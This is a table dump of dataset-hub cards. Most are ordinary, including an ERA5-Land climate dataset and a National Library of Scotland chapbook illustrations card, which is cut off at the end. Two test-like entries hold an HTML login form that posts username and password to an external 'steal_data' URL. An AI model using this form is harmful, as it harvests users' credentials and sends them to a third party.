sha
stringlengths 40
40
| text
stringlengths 1
13.4M
| id
stringlengths 2
117
| tags
sequencelengths 1
7.91k
| created_at
stringlengths 25
25
| metadata
stringlengths 2
875k
| last_modified
stringlengths 25
25
| arxiv
sequencelengths 0
25
| languages
sequencelengths 0
7.91k
| tags_str
stringlengths 17
159k
| text_str
stringlengths 1
447k
| text_lists
sequencelengths 0
352
| processed_texts
sequencelengths 1
353
|
---|---|---|---|---|---|---|---|---|---|---|---|---|
1814a7e4c91dc6bfc0f7654da1170d3cafed64a6 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form>
## Test
** test2 ** | testname/TestCard | [
"region:us"
] | 2022-07-23T01:14:50+00:00 | {} | 2022-07-23T01:27:28+00:00 | [] | [] | TAGS
#region-us
| <form action="URL method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form>
## Test
test2 | [
"## Test\n test2"
] | [
"TAGS\n#region-us \n",
"## Test\n test2"
] |
4cbca4e0faa2eca2064f49fe5159723c276eb905 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form> | dsadasdad/tesfdjh | [
"region:us"
] | 2022-07-23T01:38:32+00:00 | {} | 2022-07-23T01:39:57+00:00 | [] | [] | TAGS
#region-us
| <form action="URL method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form> | [] | [
"TAGS\n#region-us \n"
] |
3a590f87db94258c732e8d8ce68d188697818991 |
This dataset is comprised of ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5-reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file is one day, and holds 24 timesteps. | openclimatefix/era5-land | [
"license:mit",
"region:us"
] | 2022-07-23T14:13:58+00:00 | {"license": "mit"} | 2022-12-01T12:38:35+00:00 | [] | [] | TAGS
#license-mit #region-us
|
This dataset is comprised of ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5-reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file is one day, and holds 24 timesteps. | [] | [
"TAGS\n#license-mit #region-us \n"
] |
36582224499cc4c4c364ddec6d5de46839e1c451 |
# Dataset Card for National Library of Scotland Chapbook Illustrations
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/
- **Repository:** https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/
- **Paper:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf
- **Leaderboard:**
- **Point of Contact:** [email protected]
### Dataset Summary
This dataset comprises of images from chapbooks held by the [National Library of Scotland](https://www.nls.uk/) and digitised and published as its [Chapbooks Printed in Scotland](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) dataset.
> "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -[Source](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/)
Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.
This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the [Visual Geometry Group](https://www.robots.ox.ac.uk/~vgg/) in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship [awarded](https://data.nls.uk/projects/the-national-librarians-research-fellowship-in-digital-scholarship/) to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in [this paper](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf).
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/)
### Supported Tasks and Leaderboards
- `object-detection`: the dataset contains bounding boxes for images contained in the Chapbooks
- `image-classification`: a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.
- `image-matching`: a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/).
The performance on the `object-detection` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
| IOU threshold | Precision | Recall |
|---------------|-----------|--------|
| 0.50 | 0.993 | 0.911 |
| 0.75 | 0.987 | 0.905 |
| 0.95 | 0.973 | 0.892 |
The performance on the `image classification` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
Images in original dataset: 47329
Numbers of images on which at least one illustration was detected: 3629
Note that these figures do not represent images that contained multiple detections.
See the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for examples of false-positive detections.
The performance on the 'image-matching' task is undergoing evaluation.
### Languages
Text accompanying the illustrations is in English, Scots or Scottish Gaelic.
## Dataset Structure
### Data Instances
An example instance from the `illustration-detection` split:
```python
{'image_id': 4,
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'width': 600,
'height': 1080,
'objects': [{'category_id': 0,
'image_id': '4',
'id': 1,
'area': 110901,
'bbox': [34.529998779296875,
556.8300170898438,
401.44000244140625,
276.260009765625],
'segmentation': [[34.529998779296875,
556.8300170898438,
435.9700012207031,
556.8300170898438,
435.9700012207031,
833.0900268554688,
34.529998779296875,
833.0900268554688]],
'iscrowd': False}]}
```
An example instance from the `image-classification` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'label': 1}
```
An example from the `image-matching` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'group-label': 231}
```
### Data Fields
The fields for the `illustration-detection` config:
- image_id: id for the image
- height: height of the image
- width: width of the image
- image: image of the chapbook page
- objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
- bbox: bounding boxes for the images
- category_id: a label for the image
- image_id: id for the image
- iscrowd: COCO is a crowd flag
- segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
The fields for the `image-classification` config:
- image: image
- label: a label indicating if the page contains an illustration or not
The fields for the `image-matching` config:
- image: image of the chapbook page
- label: an id for a particular instance of an image i.e. the same images will share the same id.
### Data Splits
There is a single split `train` for all configs. K-fold validation was used in the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) describing this dataset, so no existing splits were defined.
## Dataset Creation
### Curation Rationale
The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/), this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this [public demo](http://meru.robots.ox.ac.uk/nls_chapbooks/filelist) documented [here](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/)
### Source Data
#### Initial Data Collection and Normalization
The initial data was taken from the [National Library of Scotland's Chapbooks Printed in Scotland dataset](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.
#### Who are the source language producers?
The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS [Data Foundry](https://data.nls.uk) under the direction of Dr. Sarah Ames.
This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.
### Annotations
#### Annotation process
Annotation was initially performed on a subset of 337 of the 47329 images, using the [VGG List Annotator (LISA](https://gitlab.com/vgg/lisa) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see [this paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for more details). Initial detections were performed with an [EfficientDet](https://ai.googleblog.com/2020/04/efficientdet-towards-scalable-and.html) object detector trained on [COCO](https://cocodataset.org/#home), the annotation of which is described in [this paper](https://arxiv.org/abs/1405.0312)
#### Who are the annotators?
Abhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.
### Personal and Sensitive Information
None
## Considerations for Using the Data
### Social Impact of Dataset
We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.
### Discussion of Biases
While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.
As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.
### Other Known Limitations
Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.
## Additional Information
### Dataset Curators
- Giles Bergel
- Abhishek Dutta
### Licensing Information
In accordance with the [original data](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/), this dataset is in the public domain.
### Citation Information
``` bibtex
@inproceedings{10.1145/3476887.3476893,
author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew},
title = {Visual Analysis of Chapbooks Printed in Scotland},
year = {2021},
isbn = {9781450386906},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
url = {https://doi.org/10.1145/3476887.3476893},
doi = {10.1145/3476887.3476893},
abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.},
booktitle = {The 6th International Workshop on Historical Document Imaging and Processing},
pages = {67–72},
numpages = {6},
keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset},
location = {Lausanne, Switzerland},
series = {HIP '21}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) and Giles Bergel for adding this dataset. | biglam/nls_chapbook_illustrations | [
"task_categories:object-detection",
"task_categories:image-classification",
"task_ids:multi-class-image-classification",
"annotations_creators:expert-generated",
"size_categories:1K<n<10K",
"license:other",
"lam",
"historic",
"arxiv:1405.0312",
"region:us"
] | 2022-07-23T20:05:40+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["object-detection", "image-classification"], "task_ids": ["multi-class-image-classification"], "pretty_name": "National Library of Scotland Chapbook Illustrations", "tags": ["lam", "historic"]} | 2023-02-15T16:11:54+00:00 | [
"1405.0312"
] | [] | TAGS
#task_categories-object-detection #task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-expert-generated #size_categories-1K<n<10K #license-other #lam #historic #arxiv-1405.0312 #region-us
| Dataset Card for National Library of Scotland Chapbook Illustrations
====================================================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage: URL
* Repository: URL
* Paper: URL
* Leaderboard:
* Point of Contact: URL@URL
### Dataset Summary
This dataset comprises of images from chapbooks held by the National Library of Scotland and digitised and published as its Chapbooks Printed in Scotland dataset.
>
> "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -Source
>
>
>
Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.
This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the Visual Geometry Group in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship awarded to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in this paper.
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the VGG Image Search Engine (VISE) software
### Supported Tasks and Leaderboards
* 'object-detection': the dataset contains bounding boxes for images contained in the Chapbooks
* 'image-classification': a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.
* 'image-matching': a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the VGG Image Search Engine (VISE) software.
The performance on the 'object-detection' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:
IOU threshold: 0.50, Precision: 0.993, Recall: 0.911
IOU threshold: 0.75, Precision: 0.987, Recall: 0.905
IOU threshold: 0.95, Precision: 0.973, Recall: 0.892
The performance on the 'image classification' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:
Images in original dataset: 47329
Numbers of images on which at least one illustration was detected: 3629
Note that these figures do not represent images that contained multiple detections.
See the paper for examples of false-positive detections.
The performance on the 'image-matching' task is undergoing evaluation.
### Languages
Text accompanying the illustrations is in English, Scots or Scottish Gaelic.
Dataset Structure
-----------------
### Data Instances
An example instance from the 'illustration-detection' split:
An example instance from the 'image-classification' split:
An example from the 'image-matching' split:
### Data Fields
The fields for the 'illustration-detection' config:
* image\_id: id for the image
* height: height of the image
* width: width of the image
* image: image of the chapbook page
* objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
+ bbox: bounding boxes for the images
+ category\_id: a label for the image
+ image\_id: id for the image
+ iscrowd: COCO is a crowd flag
+ segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
The fields for the 'image-classification' config:
* image: image
* label: a label indicating if the page contains an illustration or not
The fields for the 'image-matching' config:
* image: image of the chapbook page
* label: an id for a particular instance of an image i.e. the same images will share the same id.
### Data Splits
There is a single split 'train' for all configs. K-fold validation was used in the paper describing this dataset, so no existing splits were defined.
Dataset Creation
----------------
### Curation Rationale
The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of VGG Image Search Engine (VISE) software, this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this public demo documented here
### Source Data
#### Initial Data Collection and Normalization
The initial data was taken from the National Library of Scotland's Chapbooks Printed in Scotland dataset No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.
#### Who are the source language producers?
The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS Data Foundry under the direction of Dr. Sarah Ames.
This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.
### Annotations
#### Annotation process
Annotation was initially performed on a subset of 337 of the 47329 images, using the VGG List Annotator (LISA software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see this paper for more details). Initial detections were performed with an EfficientDet object detector trained on COCO, the annotation of which is described in this paper
#### Who are the annotators?
Abhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.
### Personal and Sensitive Information
None
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.
### Discussion of Biases
While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.
As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.
### Other Known Limitations
Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.
Additional Information
----------------------
### Dataset Curators
* Giles Bergel
* Abhishek Dutta
### Licensing Information
In accordance with the original data, this dataset is in the public domain.
### Contributions
Thanks to @davanstrien and Giles Bergel for adding this dataset.
| [
"### Dataset Summary\n\n\nThis dataset comprises of images from chapbooks held by the National Library of Scotland and digitised and published as its Chapbooks Printed in Scotland dataset.\n\n\n\n> \n> \"Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands.\" -Source\n> \n> \n> \n\n\nChapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.\n\n\nThis dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the Visual Geometry Group in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship awarded to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in this paper.\n\n\nThe dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the VGG Image Search Engine (VISE) software",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': the dataset contains bounding boxes for images contained in the Chapbooks\n* 'image-classification': a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.\n* 'image-matching': a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the VGG Image Search Engine (VISE) software.\n\n\nThe performance on the 'object-detection' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nIOU threshold: 0.50, Precision: 0.993, Recall: 0.911\nIOU threshold: 0.75, Precision: 0.987, Recall: 0.905\nIOU threshold: 0.95, Precision: 0.973, Recall: 0.892\n\n\nThe performance on the 'image classification' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nImages in original dataset: 47329\nNumbers of images on which at least one illustration was detected: 3629\n\n\nNote that these figures do not represent images that contained multiple detections.\n\n\nSee the paper for examples of false-positive detections.\n\n\nThe performance on the 'image-matching' task is undergoing evaluation.",
"### Languages\n\n\nText accompanying the illustrations is in English, Scots or Scottish Gaelic.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example instance from the 'illustration-detection' split:\n\n\nAn example instance from the 'image-classification' split:\n\n\nAn example from the 'image-matching' split:",
"### Data Fields\n\n\nThe fields for the 'illustration-detection' config:\n\n\n* image\\_id: id for the image\n* height: height of the image\n* width: width of the image\n* image: image of the chapbook page\n* objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ bbox: bounding boxes for the images\n\t+ category\\_id: a label for the image\n\t+ image\\_id: id for the image\n\t+ iscrowd: COCO is a crowd flag\n\t+ segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)\n\n\nThe fields for the 'image-classification' config:\n\n\n* image: image\n* label: a label indicating if the page contains an illustration or not\n\n\nThe fields for the 'image-matching' config:\n\n\n* image: image of the chapbook page\n* label: an id for a particular instance of an image i.e. the same images will share the same id.",
"### Data Splits\n\n\nThere is a single split 'train' for all configs. K-fold validation was used in the paper describing this dataset, so no existing splits were defined.\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\nThe dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of VGG Image Search Engine (VISE) software, this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this public demo documented here",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe initial data was taken from the National Library of Scotland's Chapbooks Printed in Scotland dataset No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.",
"#### Who are the source language producers?\n\n\nThe initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS Data Foundry under the direction of Dr. Sarah Ames.\n\n\nThis subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.",
"### Annotations",
"#### Annotation process\n\n\nAnnotation was initially performed on a subset of 337 of the 47329 images, using the VGG List Annotator (LISA software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see this paper for more details). Initial detections were performed with an EfficientDet object detector trained on COCO, the annotation of which is described in this paper",
"#### Who are the annotators?\n\n\nAbhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.",
"### Personal and Sensitive Information\n\n\nNone\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nWe believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.",
"### Discussion of Biases\n\n\nWhile the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.\n\n\nThe definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.\n\n\nAs there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.",
"### Other Known Limitations\n\n\nWithin this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\n* Giles Bergel\n* Abhishek Dutta",
"### Licensing Information\n\n\nIn accordance with the original data, this dataset is in the public domain.",
"### Contributions\n\n\nThanks to @davanstrien and Giles Bergel for adding this dataset."
] | [
"TAGS\n#task_categories-object-detection #task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-expert-generated #size_categories-1K<n<10K #license-other #lam #historic #arxiv-1405.0312 #region-us \n",
"### Dataset Summary\n\n\nThis dataset comprises of images from chapbooks held by the National Library of Scotland and digitised and published as its Chapbooks Printed in Scotland dataset.\n\n\n\n> \n> \"Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands.\" -Source\n> \n> \n> \n\n\nChapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.\n\n\nThis dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the Visual Geometry Group in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship awarded to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in this paper.\n\n\nThe dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the VGG Image Search Engine (VISE) software",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': the dataset contains bounding boxes for images contained in the Chapbooks\n* 'image-classification': a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.\n* 'image-matching': a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the VGG Image Search Engine (VISE) software.\n\n\nThe performance on the 'object-detection' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nIOU threshold: 0.50, Precision: 0.993, Recall: 0.911\nIOU threshold: 0.75, Precision: 0.987, Recall: 0.905\nIOU threshold: 0.95, Precision: 0.973, Recall: 0.892\n\n\nThe performance on the 'image classification' task reported in the paper Visual Analysis of Chapbooks Printed in Scotland is as follows:\n\n\nImages in original dataset: 47329\nNumbers of images on which at least one illustration was detected: 3629\n\n\nNote that these figures do not represent images that contained multiple detections.\n\n\nSee the paper for examples of false-positive detections.\n\n\nThe performance on the 'image-matching' task is undergoing evaluation.",
"### Languages\n\n\nText accompanying the illustrations is in English, Scots or Scottish Gaelic.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nAn example instance from the 'illustration-detection' split:\n\n\nAn example instance from the 'image-classification' split:\n\n\nAn example from the 'image-matching' split:",
